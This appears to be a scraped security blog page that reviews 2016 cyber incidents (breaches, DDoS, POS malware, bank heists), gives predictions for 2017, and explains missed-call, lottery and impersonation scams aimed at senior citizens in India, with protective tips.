A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.

smartphones-blog


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.

cybersecurity3


Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.

pandasecurity-punkeyPOS-principal1


POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.

blog


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Ransomware

Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Companies

Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


DDoS

The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


Mobile Phones

The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


Cyberwarfare

We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

Cyber scams that target senior citizens in India


A senior citizen’s primary gadget is a mobile phone which in earlier years was used to make/ receive calls and SMSes. With rising Internet penetration, children living in different cities and countries, video calls and rising costs; senior citizens have begun to use alternate communication channels like Whatsapp and Skype. Senior citizens have become easy targets for cybercriminals given their trusting nature and poor understanding on how voice and data services work.  Cybercriminals and Spammers target these four types of communication channels (voice, instant messaging, SMS and internet telephony) to defraud senior citizens. The three most prevalent types of scams are:

Missed Call or One Ring Telephone Scams

The most popular one is the “missed call” scam. A missed call from an international number is made to a senior citizen’s phone. When the senior citizen calls back, the call is connected to a premium rate number where the bill rates are significantly higher as there is a third party service charge for these services added to the bill. Senior citizens end up with large postpaid bills or find their prepaid credit wiped out. The modus operandi of these missed call scams is to ensure that once a call back is received, the caller is kept on the line for several minutes. The longer the duration the more money the scammer makes. To do so, either the caller is looped in an interactive voice response system which tells the caller to wait while the call is connected or the caller is connected to a recorded adult phone message. One senior citizen was so perturbed that she wanted to call the police because she heard a woman being beaten and screaming for help. Fortunately for her, she had limited prepaid credit and the call ran out. Many senior citizens become anxious and literarily rush to their telecommunication service provider only to receive a stoic response that they are not responsible for any calls made or received. To resolve their excess charge they are advised to take up the matter with the third party service provider, usually a dubious adult chat firm in a third world country. For the small sum of money lost, the cost of this pursuit would make it an unviable option with no guarantee of refunds.

Senior citizens can protect themselves by:

1.    Restricting outbound international calling,  if there is no necessity to make overseas call

2.    Ignore short duration missed calls from international destinations

3.    Checking the international dial code for missed numbers before returning the call. If the number originates from a country where they do not expect a call from, then it would be best not to return them

Lottery Type Scams 

In fake lottery scams, senior citizens receive SMSes or Whatsapp messages congratulating them on having won a “big lottery” and asking them to quickly claim their money.  One senior citizens though this was a valid claim because “it was not classified as spam” by the service provider. 40% of spam is not blocked by spam filters and spam filters only help but do not guarantee that a communication is legitimate. Once a request for redeeming the claim is made these scams always ask for either personal information or the payment of an advance fee, which when paid is either followed by a further request for money and the eventual disappearance act by the scamster.

 Senior citizens must not share personal data online and always avoid requests made for money to process a lottery win or to release a parcel, or to send a free gift as these are sure signs of fraudulent behavior. Senior citizens should also consult knowledgeable family members or friends before responding.

Disclosure of Personal Information

Extracting personal information which can later be sold or used to access online back accounts is another type of scam. Scammers pose as officials in position of authority (banks, police, and income tax) or as sellers of credits cards/personal loans using these “roles” to exert sufficient pressure to extract personal and financial data.

Senior citizens should always remember that however convincing the callers are information like bank accounts, financial records and passwords are never sought by authorities or banks.